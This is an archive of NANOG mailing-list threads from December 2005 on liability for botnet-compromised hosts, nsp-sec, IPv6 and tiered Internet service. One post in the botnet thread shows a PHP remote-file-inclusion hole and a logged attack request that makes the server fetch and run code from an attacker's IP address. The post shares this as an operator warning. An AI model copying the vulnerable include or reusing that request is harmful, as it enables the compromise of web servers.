Re: Compromised machines liable for damage?
Title: Re: Compromised machines liable for damage? I demand to immediately know who. But, I don't know why. Money talks on the Internet and I keep bathing in SBA quarters (note to Gadi: you won't get it, don't ask - North AMERICAN Net..). Damnit. Where's Kibo!?? I want my lava lamp back! Marty -Original Message- From: Barry Shein [mailto:[EMAIL PROTECTED]] Sent: Wed Dec 28 23:29:14 2005 To: NANOG Subject: Re: Compromised machines liable for damage? To beat a dead horse just a little harder the problem I have is when a certain company kept distributing software with security flaws specifically because they're profiting from those flaws. For example, graphics libraries which accept binary code chunks to be executed in kernel mode without limits for support of quick screen updates in games considered of marketing importance. Blaming it on the games vendors seems inadequate, particularly over several years and releases of each. That's just pure economics and, hence, profiting on others' serious pain. -- -Barry Shein The World | [EMAIL PROTECTED] | http://www.TheWorld.com Purveyors to the Trade | Voice: 800-THE-WRLD | Login: Nationwide Software Tool Die | Public Access Internet | SINCE 1989 *oo*
Re: Compromised machines liable for damage?
Title: Re: Compromised machines liable for damage? We didn't want it the first time. Try network operations. (rushes to finish the jc dill killfile entry) -Original Message- From: JC Dill [mailto:[EMAIL PROTECTED]] Sent: Tue Dec 27 18:01:29 2005 To: NANOG Subject: Re: Compromised machines liable for damage? Here is the link again: http://www.lectlaw.com/files/cur78.htm Please spend some time reading that site to educate yourself about the facts and common misconceptions about this incident before you try any further analogies based on it. In *this* case the injured woman had done most[1] of the reasonable things one should do to try to mitigate injury, but she was seriously injured and the seriousness of the injury was directly due to the product being defective. McDonalds was held liable because they knowingly and intentionally sold a defective product even after having over 700 prior incidents (serious burns) reported to them due to this defect (the coffee being too hot). Jason Frisvold wrote: Still, a little common sense... Hot coffee of any type, between the legs, in a moving car? Umm.. even normal coffee still causes a jump of pain. That jump of pain could easily cause a car accident. quote Critics of civil justice, who have pounced on this case, often charge that Liebeck was driving the car or that the vehicle was in motion when she spilled the coffee; neither is true. /quote The coffee wasn't just hot, it was much too hot to be safely consumed. Note that quote [if the] spill had involved coffee at 155 degrees, the liquid would have cooled and given her time to avoid a serious burn /quote and quote The company admitted its customers were unaware that they could suffer third degree burns from the coffee and that a statement on the side of the cup was not a warning but a reminder since the location of the writing would not warn customers of the hazard. /quote Now let us consider Microsoft's continued sales of defective Windows and IE software given their track record for failing to ensure that their product works safely and doesn't enable others to cause damage to the user's system and data or (of primary importance to the networking community) the systems and networks of others: http://bcheck.scanit.be/bcheck/page.php?name=STATS2004 Even if the end user updates their Windows/IE software the minute a security update is available, their browser would still have been vulnerable for all but 7 days in 2004! I wonder how 2005 has been shaping up. Hmmm. I wonder if Stella's lawyers would like to take on Microsoft jc [1] The jury awarded Liebeck $200,000 in compensatory damages. This amount was reduced to $160,000 because the jury found Liebeck 20 percent at fault in the spill. The jury also awarded Liebeck $2.7 million in punitive damages, which equals about two days of McDonalds' coffee sales. Post-verdict investigation found that the temperature of coffee at the local Albuquerque McDonalds had dropped to 158 degrees fahrenheit. The trial court subsequently reduced the punitive award to $480,000 -- or three times compensatory damages -- even though the judge called McDonalds' conduct reckless, callous and willful.
RE: Compromised machines liable for damage?
Title: RE: Compromised machines liable for damage? If you want to choke off freeware(gnu, et. Al), sure, go after them. I doubt the licensing agreement allows it though. (IANAL). I think all you'd do is encourage people to write more music about 'freeing the software'. I'd rather not be stricken in that fashion. I think that angle is DOA. Martin -Original Message- From: Joseph Jackson [mailto:[EMAIL PROTECTED]] Sent: Mon Dec 26 03:13:02 2005 To: Hannigan, Martin Cc: NANOG Subject: RE: Compromised machines liable for damage? What about the coders that write the buggy software in the first place? Don't they hold some of the responsibility also? IE I am running some webserver software that a bug is found in it. Attackers use that bug in the software to generate a DOS attack against you from my machines. No update has been released for the software I am running and/or no warning as been released. You sue me I sue the coders. What a wonderful world. (I'm not for this but its another side of the issue.) _ From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Hannigan, Martin Sent: Sunday, December 25, 2005 9:22 PM To: Steven M. Bellovin Cc: Dave Pooser; NANOG Subject: Re: Compromised machines liable for damage? Yes, I agree. As usual, I too am 'IANAL'. Marty -Original Message- From: Steven M. Bellovin [mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Sun Dec 25 23:52:27 2005 To: Hannigan, Martin Cc: Dave Pooser; NANOG Subject: Re: Compromised machines liable for damage? In message [EMAIL PROTECTED] om, Hannigan, Martin writes: Dave, RIAA wins almost 100pct vs p2p'ers ir sues. Its an interesting = dichotomy. Wins is too strong a word, since I don't think any have gone to court -- see http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html as my source. Besides, it's a very different situation. For my take on liability issues -- note that I'm not a lawyer, and note that this is from 1994 -- see http://www.wilyhacker.com/1e/chap12.pdf http://www.wilyhacker.com/1e/chap12.pdf --Steven M. Bellovin, http://www.cs.columbia.edu/~smb http://www.cs.columbia.edu/~smb
RE: Compromised machines liable for damage?
Title: RE: Compromised machines liable for damage? In the general sense, possibly, but where there are lawyers there is always discoragement. Suing people with no money is easy, but it does stop them from contributing in most cases. There are always a few who like getting sued. RIAA has shown companies will widescale sue so your argument is suspect, IMO.. -Original Message- From: Owen DeLong [mailto:[EMAIL PROTECTED]] Sent: Mon Dec 26 23:11:13 2005 To: Hannigan, Martin; Joseph Jackson Cc: NANOG Subject: RE: Compromised machines liable for damage? I've seen this argument time and again, and, the reality is that it is absolutely false. In fact, it will do nothing but encourage freeware. Liability for a product generally doesn't exist until money changes hands. If you design a piece of equipment and post the drawings in the public domain, you are not liable if someone builds it and harms themselves. You are liable if someone pays you for the design, because, the money changing hands creates a duty to care. Outside of a duty to care, the only opening for liability is if they can prove that you failed to take some precaution that would be expected of any reasonably prudent person. So, liability for bad software and the consequences it creates would be bad for the Micr0$0ft and Oracles of the world, but, generally, very good for the Free Software movement. It might turn out to be bad for organizations like Cygnus and RedHat, but, that's more of a gray area. As to the specific example cited... If no update has been released, in the case of Open Source, that's no excuse. You have the source, so, you don't have to wait for an update. In the case of closed software, then, I think manufacturer liability is a good thing for the industry in general. Owen --On December 26, 2005 10:07:20 PM -0500 Hannigan, Martin [EMAIL PROTECTED] wrote: If you want to choke off freeware(gnu, et. Al), sure, go after them. I doubt the licensing agreement allows it though. (IANAL). I think all you'd do is encourage people to write more music about 'freeing the software'. I'd rather not be stricken in that fashion. I think that angle is DOA. Martin -Original Message- From: Joseph Jackson [mailto:[EMAIL PROTECTED]] Sent: Mon Dec 26 03:13:02 2005 To: Hannigan, Martin Cc: NANOG Subject: RE: Compromised machines liable for damage? What about the coders that write the buggy software in the first place? Don't they hold some of the responsibility also? IE I am running some webserver software that a bug is found in it. Attackers use that bug in the software to generate a DOS attack against you from my machines. No update has been released for the software I am running and/or no warning as been released. You sue me I sue the coders. What a wonderful world. (I'm not for this but its another side of the issue.) _ From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Hannigan, Martin Sent: Sunday, December 25, 2005 9:22 PM To: Steven M. Bellovin Cc: Dave Pooser; NANOG Subject: Re: Compromised machines liable for damage? Yes, I agree. As usual, I too am 'IANAL'. Marty -Original Message- From: Steven M. Bellovin [mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Sun Dec 25 23:52:27 2005 To: Hannigan, Martin Cc: Dave Pooser; NANOG Subject: Re: Compromised machines liable for damage? In message [EMAIL PROTECTED] om, Hannigan, Martin writes: Dave, RIAA wins almost 100pct vs p2p'ers ir sues. Its an interesting = dichotomy. Wins is too strong a word, since I don't think any have gone to court -- see http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html as my source. Besides, it's a very different situation. For my take on liability issues -- note that I'm not a lawyer, and note that this is from 1994 -- see http://www.wilyhacker.com/1e/chap12.pdf http://www.wilyhacker.com/1e/chap12.pdf --Steven M. Bellovin, http://www.cs.columbia.edu/~smb http://www.cs.columbia.edu/~smb -- If this message was not signed with gpg key 0FE2AA3D, it's probably a forgery.
RE: Compromised machines liable for damage?
Title: RE: Compromised machines liable for damage? Botnet code is open source, as far as I know. Maybe not by design, but I have gigs of it and its all googleable. Not being a lawyer, I'd guess the plaintiff size is highy debateable based on source or destination. Marty -Original Message- From: Owen DeLong [mailto:[EMAIL PROTECTED]] Sent: Mon Dec 26 23:32:04 2005 To: Hannigan, Martin; Joseph Jackson Cc: NANOG Subject: RE: Compromised machines liable for damage? RIAA is a very different context from what we are talking about here. First, the number of people getting attacked from Open Source systems is very small, so, you have a very small class of plaintiffs. Second, said class of plaintiffs is probably not as well funded as RIAA. OTOH, the number of people/organizations being attacked from Micr0$0ft based systems is relatively high, so, a large class of plaintiffs, and, some of them being enterprises are relatively well funded. Second, in the case of RIAA, it is businesses suing to do what they perceive as protecting their profit stream, and, they know they are suing a collection of defendants that are relatively poorly funded and have no organization. In the case of Open Source, I think there is a pretty good track record of the community coming to the aid of those that get sued for various reasons (DeCSS comes to mind). Sure, it's easy to sue someone who doesn't have any money, but, there's no point in doing so. Frankly, it's not the people with no money that are at risk here. It's the people with some money and some assets. If you have nothing, you're pretty safe ignoring a civil suit because you have nothing to lose. Frankly, if RIAA were to sue me, it wouldn't cost me $250,000 to fight it. It might cost me a few thousand if I chose to involve a lawyer in some portion of the process, but, initially, I think I could make their life difficult enough to get them to go away without involving a lawyer. I've already made MPAA/Disney go away twice without a lawyer. Admittedly, they went away before even filing a suit, so, technically, I haven't been sued, but, I've been threatened by them, and, I'm sure if I'd buckled under or failed to confront them appropriately, I would have either gotten sued or ended up handing over money. The costs of defending a suit are $0 until you hire a lawyer. Owen --On December 26, 2005 11:18:46 PM -0500 Hannigan, Martin [EMAIL PROTECTED] wrote: In the general sense, possibly, but where there are lawyers there is always discoragement. Suing people with no money is easy, but it does stop them from contributing in most cases. There are always a few who like getting sued. RIAA has shown companies will widescale sue so your argument is suspect, IMO.. -Original Message- From: Owen DeLong [mailto:[EMAIL PROTECTED]] Sent: Mon Dec 26 23:11:13 2005 To: Hannigan, Martin; Joseph Jackson Cc: NANOG Subject: RE: Compromised machines liable for damage? I've seen this argument time and again, and, the reality is that it is absolutely false. In fact, it will do nothing but encourage freeware. Liability for a product generally doesn't exist until money changes hands. If you design a piece of equipment and post the drawings in the public domain, you are not liable if someone builds it and harms themselves. You are liable if someone pays you for the design, because, the money changing hands creates a duty to care. Outside of a duty to care, the only opening for liability is if they can prove that you failed to take some precaution that would be expected of any reasonably prudent person. So, liability for bad software and the consequences it creates would be bad for the Micr0$0ft and Oracles of the world, but, generally, very good for the Free Software movement. It might turn out to be bad for organizations like Cygnus and RedHat, but, that's more of a gray area. As to the specific example cited... If no update has been released, in the case of Open Source, that's no excuse. You have the source, so, you don't have to wait for an update. In the case of closed software, then, I think manufacturer liability is a good thing for the industry in general. Owen --On December 26, 2005 10:07:20 PM -0500 Hannigan, Martin [EMAIL PROTECTED] wrote: If you want to choke off freeware(gnu, et. Al), sure, go after them. I doubt the licensing agreement allows it though. (IANAL). I think all you'd do is encourage people to write more music about 'freeing the software'. I'd rather not be stricken in that fashion. I think that angle is DOA. Martin -Original Message- From: Joseph Jackson [mailto:[EMAIL PROTECTED]] Sent: Mon Dec 26 03:13:02 2005 To: Hannigan, Martin Cc: NANOG Subject: RE: Compromised machines liable for damage? What about the coders that write the buggy software in the first place? Don't they hold some of the responsibility also? IE I am running some webserver software
Re: Destructive botnet originating from Japan
Title: Re: Destructive botnet originating from Japan What's nsp-sec? -Original Message- From: Richard A Steenbergen [mailto:[EMAIL PROTECTED]] Sent: Sun Dec 25 04:25:15 2005 To: Gadi Evron Cc: Rob Thomas; NANOG Subject: Re: Destructive botnet originating from Japan On Sun, Dec 25, 2005 at 02:06:38AM -0600, Gadi Evron wrote: It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here. Could have told you that a long time ago. NSP-SEC became useless the day it became so bogged down in its own self-aggrandizing paranoia that no one could possibly be bothered to actually tell anyone outside of the secret handshake club about security issues they've spotted. On the other hand, if you ARE going to sit around pissing and moaning about botnets you are too sekure to tell anyone else about, thus assuring they never get fixed, at least it's nice to do it in one secret place so I don't have to hear it. :) -- Richard A Steenbergen [EMAIL PROTECTED] http://www.e-gerbil.net/ras GPG Key ID: 0xF8B12CBC (7535 7F59 8204 ED1F CC1C 53AF 4C41 5ECA F8B1 2CBC)
Re: Destructive botnet originating from Japan
Title: Re: Destructive botnet originating from Japan (jon I know you didn't say, but the original must have got nailed in my spam filters) The best thing about this statement is that since I don't report to nanog nsp-sec, or Tyler Durden, the first rule of fight club can kiss my arse. But then again, this really isn't NANOG's business now is it? Or is it? Happy Christmas folks! :) Marty -Original Message- From: Jon Lewis [mailto:[EMAIL PROTECTED]] Sent: Sun Dec 25 17:37:57 2005 To: [EMAIL PROTECTED] Cc: NANOG Subject: Re: Destructive botnet originating from Japan On Sun, 25 Dec 2005, Rubens Kuhl Jr. wrote: The first rule of nsp-sec is, you do not talk about nsp-sec The second rule of nsp-sec is, you DO NOT talk about nsp-sec https://puck.nether.net/mailman/listinfo/nsp-security There's nothing secret about the existence or purpose of the list. I don't know enough about Barrett to guess as to whether or not he'd qualify. Also, I was considering emailing Barrett privately, but since there seems to be so much misinformation going around, others will probably benefit from this. If you want to send out list of IPs suspected of being bots or really any other class of insecure/0wn3d systems, to make it easier for those who care to find their IPs in your list, run it through the Team Cymru whois server first. http://www.cymru.com/BGP/whois.html Then sort the list numerically by ASN. That way, people can scroll through it, or search by ASN, and quickly determine if there's any further action worth taking. It's also a really good idea to include timestamps, ideally exact ones in GMT per IP. In this case (unix bots) it's not as likely, but typical windows bots frequently show up on end-user systems with dynamic IPs. Telling me one of my dial pool IPs was a bot recently is not as useful as telling me it was a bot 2005-12-25 02:30:45 GMT. -- Jon Lewis | I route Senior Network Engineer | therefore you are Atlantic Net | _ http://www.lewis.org/~jlewis/pgp for PGP public key_
Re: Destructive botnet originating from California (was Japan)
Title: Re: Destructive botnet originating from California (was Japan) Hows the mitigation going? We can argue semantics at Dallas NANOG. -Original Message- From: Jon Lewis [mailto:[EMAIL PROTECTED]] Sent: Sun Dec 25 22:23:19 2005 To: Barrett G. Lyon Cc: NANOG Subject: Re: Destructive botnet originating from California (was Japan) On Sun, 25 Dec 2005, Barrett G. Lyon wrote: I would have sent out a clean list sorted via AS and IP, except I have been working from vacation on GPRS via my 1 bar of service on my cell phone. What's vacation? I gather Prolexic isn't a one man shop. Nobody else had a better internet connection and a few minutes to tidy up the data and make the post? If the right thing is to post this information to a more private list, then I would do so. However, I think it has been benificial to get this information out to the public where they can actually do something about it. I've been I didn't say nanog wasn't a good place to post the info...or that there aren't better places. Just that if you want people to take action based on the data, present it in a more reader-friendly and meaningful format. Also, mixing IPs and PTRs in such a report is not a great idea. I actually did scan through the message looking for any of my prefix's and $work's primary domain name. If there was a PTR for some customer of ours in their own domain, I didn't see it, but I also didn't look for it. Posting data by ASN/IP totally avoids that issue and makes looking for your ASN(s) trivial. getting emails from a lot of people thanking for the posts because they were able to identify a lot of messy traffic on their network and put an end to it. Posting information like this to a private list may not have accomplished much. I don't see a problem with posting it to both or as many appropriate lists as you can find. Nanog is kind of geo-specific though. Other lists might have much broader representation from the entire internet. This should be another thread completely, but I am wondering about the liability of the individual's who have owned machines that are attacking me/my clients. I'm not a lawyer but I would assume that tort liability law could apply and find someone liable for allowing their machine to DDoS people. IANAL either, but if I steal your car and run someone over with it, are you liable? Should you be? Computers are stolen or at least commandeered on the internet at an alarming rate because those who do it know that odds are, they won't get caught. And if they are caught, odds are, nothing will happen. And there's apparently considerable profit in the sale of commandeered systems or services provided by them. I doubt you'll get anywhere trying to make an example of someone who's system was hacked or even just used improperly. I really don't think this problem can be solved by scaring sysadmins or corporations. There will always be security holes. -- Jon Lewis | I route Senior Network Engineer | therefore you are Atlantic Net | _ http://www.lewis.org/~jlewis/pgp for PGP public key_
Re: Destructive botnet originating from Japan
Title: Re: Destructive botnet originating from Japan Prolexic qualifies. They do what MCI, ATT, Arbor, and others do regarding ddos mitigation and, IMHO, should be a shoe in. I was... subscribed and we are less valuable to the overall good so you decide (we do have presence ther though). Verisign is not an SP. Critical infra is 'critical' (us) but the attacks come from you guys. Whoever can help. I vote for realism. Marty -Original Message- From: Jon Lewis [mailto:[EMAIL PROTECTED]] Sent: Sun Dec 25 17:37:57 2005 To: [EMAIL PROTECTED] Cc: NANOG Subject: Re: Destructive botnet originating from Japan On Sun, 25 Dec 2005, Rubens Kuhl Jr. wrote: The first rule of nsp-sec is, you do not talk about nsp-sec The second rule of nsp-sec is, you DO NOT talk about nsp-sec https://puck.nether.net/mailman/listinfo/nsp-security There's nothing secret about the existence or purpose of the list. I don't know enough about Barrett to guess as to whether or not he'd qualify. Also, I was considering emailing Barrett privately, but since there seems to be so much misinformation going around, others will probably benefit from this. If you want to send out list of IPs suspected of being bots or really any other class of insecure/0wn3d systems, to make it easier for those who care to find their IPs in your list, run it through the Team Cymru whois server first. http://www.cymru.com/BGP/whois.html Then sort the list numerically by ASN. That way, people can scroll through it, or search by ASN, and quickly determine if there's any further action worth taking. It's also a really good idea to include timestamps, ideally exact ones in GMT per IP. In this case (unix bots) it's not as likely, but typical windows bots frequently show up on end-user systems with dynamic IPs. Telling me one of my dial pool IPs was a bot recently is not as useful as telling me it was a bot 2005-12-25 02:30:45 GMT. -- Jon Lewis | I route Senior Network Engineer | therefore you are Atlantic Net | _ http://www.lewis.org/~jlewis/pgp for PGP public key_
RE: Compromised machines liable for damage?
Title: RE: Compromised machines liable for damage? Dave, RIAA wins almost 100pct vs p2p'ers ir sues. Its an interesting dichotomy. Marty -Original Message- From: Dave Pooser [mailto:[EMAIL PROTECTED]] Sent: Sun Dec 25 23:09:02 2005 To: NANOG Subject: Compromised machines liable for damage? This should be another thread completely, but I am wondering about the liability of the individual's who have owned machines that are attacking me/my clients. As a practical matter, I'd expect it to be difficult to try. Convincing a jury that running a PHP version that's three months out of date constitutes gross negligence because you should have read about the vulnerability on the Web might be... tricky. Especially when you have to explain to the jury what PHP is. Dueling expert witnesses arguing about best practice, poor confused webmaster/Amway distributor looking bewildered at all this technical talk (I figgered I just buy Plesk and I was good to go. I dunno nothin' about PHP. Isn't that a drug?) Not to mention working out what percentage of the damages you suffered should come from each host. But yeah, I'd like to see it tried. Lawyering up is one of our core competencies here in the USA; maybe we could use it for good instead of evil. -- Dave Pooser Manager of Information Services Alford Media http://www.alfordmedia.com
Re: Compromised machines liable for damage?
Title: Re: Compromised machines liable for damage? Yes, I agree. As usual, I too am 'IANAL'. Marty -Original Message- From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]] Sent: Sun Dec 25 23:52:27 2005 To: Hannigan, Martin Cc: Dave Pooser; NANOG Subject: Re: Compromised machines liable for damage? In message [EMAIL PROTECTED] om, Hannigan, Martin writes: Dave, RIAA wins almost 100pct vs p2p'ers ir sues. Its an interesting = dichotomy. Wins is too strong a word, since I don't think any have gone to court -- see http://www.nytimes.com/aponline/arts/AP-Music-Download-Suit.html as my source. Besides, it's a very different situation. For my take on liability issues -- note that I'm not a lawyer, and note that this is from 1994 -- see http://www.wilyhacker.com/1e/chap12.pdf --Steven M. Bellovin, http://www.cs.columbia.edu/~smb
RE: Re:Destructive botnet originating from Japan
Title: RE: Re:Destructive botnet originating from Japan You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :) -Original Message- From: Barrett G. Lyon [mailto:[EMAIL PROTECTED]] Sent: Fri Dec 23 19:21:47 2005 To: nanog@merit.edu Subject: Re:Destructive botnet originating from Japan Well it appears that bad code always seems to be the root of problems, according to our research today the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string: index.php?test=test $test=$_GET[test]; include($test.php); When the include executes the test string passed from the GET includes execution instructions: GET /index.php?test=http%3A//210.170.60.2/? HTTP/1.0 200 8010 - Wget/1.6 It appears that the attacker at 210.170.60.2 (also the botnet hosting IRC server) is spreading his code as the include is called, pulling and executing PHP code from a remote server that injects the software. I'm not sure if this needs to be alerted to anyone outside of this list, but it's pretty nasty. -Barrett
RE: Bogon stupidity... warning... operational post.
On 12/22/05 1:35 PM, Christopher L. Morrow [EMAIL PROTECTED] wrote: On Thu, 22 Dec 2005, william(at)elan.net wrote: On Thu, 22 Dec 2005, Robert Boyle wrote: At 12:56 PM 12/22/2005, you wrote: P.S. 204/8 was not the only problem, there were problems with 128/8 and 133/8 as well so my apologies to people who may have noticed problems overnight. 199.128.0.0/9 too. Yes, legacy blocks (with large number of smaller allocations) whenever datasize during processing exceeded certain amount. The bad data was present at 2 of 4 servers for duration of the night but dns was being so 50+% of your system was hozed for some long period of time :( bad. changes same time as well, so I don't know how much affect there was but apparently considerable; this is the most serious problem in months. 'most serious problem in months' ... this has happened in smaller chunks during the past 'months' ? yikes... is that noted on your site so users of the 'service' will know what sorts of 'problems' they might be encountering due to their reliance on this 'service'? I wonder how many problems cymru has had in that period? I'm guess not so many... I mean this in a nice way, really. Look. Smiley. :) Use a blacklist, pay the price. I'd like to know how many people actually went to their boss and said It was that guy Williams fault even though I control and am responsible for the network.! -M
RE: Awful quiet?
Peter Dambier [EMAIL PROTECTED] writes: Used to have its IPv6 enabled. Gave me problems with connectivity. I dont have IPv6 to the outside so I had to disable the stack. Runs a lot smoother now. It tooks me week to get the IPv6 stack running in the first place. You've had quite the run of bad luck. My IPv6 stuff was working perfectly and with almost no effort. Until I lost an ethernet card in a VXR and snagged one from the IPv6 box as a spare, heh. Gotta get around to fixing that, but in the meantime no IPv6 on the colo LAN is not exactly an operational deal-killer. Once I turned on ipv6 on my Windows machine. It worked.
Biggest operational ISP in Israel?
Who is the biggest operational NSP in Israel? Thanks, Martin -- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED]
RE: Deploying IPv6 in a datacenter (Was: Awful quiet?)
Kevin Day wrote: 9) Once we started publishing records for a few sites, we started getting complaints from some users that they couldn't reach the sites. It is possible that a broken 6to4 relay somewhere was causing problems. Running your own local 6to4 relay (rfc3068) will improve performance and reduce the chances of going through a broken one. Depending upon how many around the world non native tunnels are being utilized. Early on the RIPE folks warned me about tunnels. They were right. -M
RE: #nanog: was Re: http://weblog.disgu.st down
I'd like to see a useful #nanog where network operators could chat. About what? I'm on an IRC and we chat about off topic NANOG posts. Maybe this could chat about off topic IRC off topic NANOG posts? :-) Seriously, I think there is already a #nanog. -M
RE: Addressing versus Routing (Was: Deploying IPv6 in a datacenter)
On Wed, Dec 21, 2005 at 04:43:58PM -0600, [EMAIL PROTECTED] wrote: Really? Where are the limits of BGP? Can you show me any numbers? You'd be the first. I'm not aware of any protocol inherent scaling brickwalls like with other protocols where certain timing constraints place limits (or thinking of L1 systems, you remember CSMA/CD?). Last time I checked, Ethernet is still CSMA/CD. Correct. And there you have minimum frame spacing requirements (IFG) and (e.g. with 10Base2 networks) minimum distance between stations attached to the bus to allow CSMA/CD work correctly. Interframe gap has no dependancy on station vector. The dependancy for CSMA/CD was bits on the wire and the alogorithm backed off until it was free to transmit. Are you talking about something else? -M -M
RE: Addressing versus Routing (Was: Deploying IPv6 in a datacenter)
Thus spake [EMAIL PROTECTED] On Wed, Dec 21, 2005 at 11:36:00PM +0100, Daniel Roesen wrote: Last time I checked, Ethernet is still CSMA/CD. Ok, sure, half-duplex. People using auto-neg. Only if you're running half-duplex, which is generally an error condition in modern networks. And inter(frame)gap delay. http://www.merit.edu/mail.archives/nanog/1997-11/msg00189.html This is why, IIRC, rs would have to wake up and go down to the MAE and reboot the giggle switch. -M
RE: Addressing versus Routing (Was: Deploying IPv6 in a datacenter)
Woops. This is the URL I meant to preface the comment with: http://www.google.com/search?hl=enlr=oi=defmoredefl=enq=define:Interframe+gap -M
Re: #nanog: was Re: http://weblog.disgu.st down
Title: Re: #nanog: was Re: http://weblog.disgu.st down Daniel - it should be public IMO only because you don't want some lesser experienced operators wandering into these IRC brothels and catching something or worse, giving them something...so to speak. I can wander into any chat really and say I'm vaul pixie and make you do bad things potentially, like make you buy a CB and contact me on 'secure' Channel 19 with your name server password so I can 'help'. That's 'bad', yes yes, digital certs, pgp, etc. All that. I wouldn't cry if IRC was deprecated, or archie, or gopher, but..that'll never happen so better to use education as the 'jimmy hat'. -Original Message- From: Daniel Roesen [mailto:[EMAIL PROTECTED]] Sent: Wed Dec 21 21:50:27 2005 To: nanog list Subject: Re: #nanog: was Re: http://weblog.disgu.st down On Thu, Dec 22, 2005 at 04:06:02AM +0200, Gadi Evron wrote: I'd like to see a useful #nanog where network operators could chat. That channel does exist but is not NANOG-related. Some #nanog folks who do want to finally chat on-topic hang out there. Quote from one of them: dude, this is prolly the most on topic IRC channel I was ever in. :-) Fortunately, even with currently almost 200 folks in it, there is enough self discipline to stay mostly on topic. It looked more like an 3l33t hax0rs channel to me when I visited. You are certainly talking about a different channel than me. The one I was talking about (and that should have been a private reply, not a reply to the list) isn't named #nanog. Anyway, apologies to stir this discussion, it should have been off-list anyway. :-Z Best regards, Daniel -- CLUE-RIPE -- Jabber: [EMAIL PROTECTED] -- [EMAIL PROTECTED] -- PGP: 0xA85C8AA0
RE: who's receiving comvalid/bgpsentinel spam? (Re: BGP )
# your not the only one... do you think it's worth complaining, or is this another hey, you put your contact information out there, we're just using it, and the mail isn't spam, it's absolutely on-topic? spammer? In my experiencce, these are being originated from here i.e. that poster is a subscriber here and he is harvesting from here. I'll be shopping at the Burlington Mall late this afternoon. Their office is directly next door, on the way to Starbucks. I'll pop over and see if they have a valid podstal address (fraudulent domain complaint) and perhaps I will pop in and ask who is in charge of The Annoying Spam Department and request removal in person. -M
RE: Two Tiered Internet
[ SNIP ] This is not directed at Sean, but please -- as a fomer Cisco engineering flunky, I can distinguish between marketing fluff (even when disguised as a 'case study') and real figures, and the truth is, there are no figures, because there is dismal adoption of the services. Go figure. Whatever. Sean recently joined Cisco marketing hence the quoting of vendor cruft as policy. It would be nice to fess up to that with an @cisco or at least an I work for Cisco Marketing disclaimer. -M
RE: monitoring Huawei routers with Cacti.
Fellow Nanogers, In one of our WAN circuits we have a Huawei Quidway router. Has anyone developed a Cacti template for monitoring that kind of device? Configuring it to be seen as a Cisco router doesn't work. Abraços, Marlon Borba, CISSP. http://forums.cacti.net/about9702.htmlhighlight=huawei You could also drop a number off the snmp OID string and see what is being returned for values you can poll. At least you should be able to. -M
RE: The Qos PipeDream [Was: RE: Two Tiered Internet]
Randy- I don't think your bank analogy is very strong, but never mind that. I agree with what you're saying in principle, that if a user/customer buys bit delivery at a fixed rate then we should deliver it. But isn't that the point. You can't guarantee delivery, just as you can't guarantee you won't get a busy signal when you make a call. -M
RE: Let's talk about ICANN
(b) Would that prevent discussion here? ;-) This is a trick question, right?
RE: Two Tiered Internet
--- Joe McGuckin [EMAIL PROTECTED] wrote: What good is 6Mbit DSL from my ISP (say, SBC for example) if only a small portion of the net (sites that pay for non-degraded access) loads at a reasonable speed and everything else sucks? There are two possible ways of having a tiered system - one is to degrade competitors/those who don't pay, and the other is to offer a premium service to those who do pay. Would your perception of those two scenarios be identical? Since the model is based around cash, there is no perception except you pay, you get priority. Someone has to pay for the Internet. The users aren't. -M
RE: Two Tiered Internet
On Wed, Dec 14, 2005 at 04:59:44AM -0500, Hannigan, Martin wrote: Since the model is based around cash, there is no perception except you pay, you get priority. Someone has to pay for the Internet. The users aren't. hum... then what am i getting for my monthly 4000+ bills from telcos and ISPs for data services and internet transit services? You don't get priority. :-) -M
RE: Gothcas of changing the IP Address of an Authoritative DNS Server
On 14-Dec-05, at 10:02 AM, Joe Abley wrote: You also want to check all the registries which are superordinate to zones your server is authoritative for, and check that any IP addresses stored in those registries for your nameserver are updated, otherwise you will experience either immediate or future glue madness. A conservative approach to this kind of transition is to arrange for your nameserver (or different nameservers hosting the same data) to respond on both the old and new addresses, and to continue in that mode until you see no queries directed at the old address for some safe-seeming interval (bearing in mind TTLs and cached records, alluded to by Steven and Sam). If you have access customers (Dial/Broadband/etc) make sure they know the IP for your DNS server is changing incase they hardcode IP of your DNS server into their PCs. It might be wise to keep the old addrs as host routes on interface aliases on the same machine for simplicity sake. (Joe said that kinda). Both unix and cisco support this. You will likely not miss a beat if you're able to do this and see who's using the old addrs(hard coded) after the TTL expires - methinks. If you really care, you could chase down your hard coded users or just shut down and force them to call. The number would dictate which one I suppose. -M
RE: Two Tiered Internet
but do i get the Internet? ... your claim is that No, my claim is that users are not paying the full boat. Almost all the telecoms are still in trouble in one way or another, interest expense, billions $$ in bonds coming due ~2008, etc. They aren't making enough money. That may be a market forces reality, but that doesn't mean the services aren't under priced. and as others have cleverly pointed out, what i really am buying is full employment for the AP departments of telco/isps. :) You're paying pensions for bankruptcy court employees in perpetuity and Michael Moore documentaries. :) I think the better questions for this thread may be: 1. Why NOT charge for priority access and transit 2. Is it inequitable to anyone, and why? 3. If there is an inequity, does it really matter?
RE: Two Tiered Internet
What I'm interested in is how the two service providers will build a two tiered Internet. The PSTN is tiered both in architecture and operation. Switching hiearchies and a seperate SS7 network which is basically a billing network. I think the thought is service levels vs. congestion control. For example, CO's have call overflow mechanisms to tandem switch points which basically seek out excess capacity and use it as overflow for call termination if and when possible. I could see an internet hiearchy where preferred traffic was switch onto hicap overflow links with controlled congestion and other traffic, non premium traffic, got a fast busy. -M
RE: The Qos PipeDream [Was: RE: Two Tiered Internet]
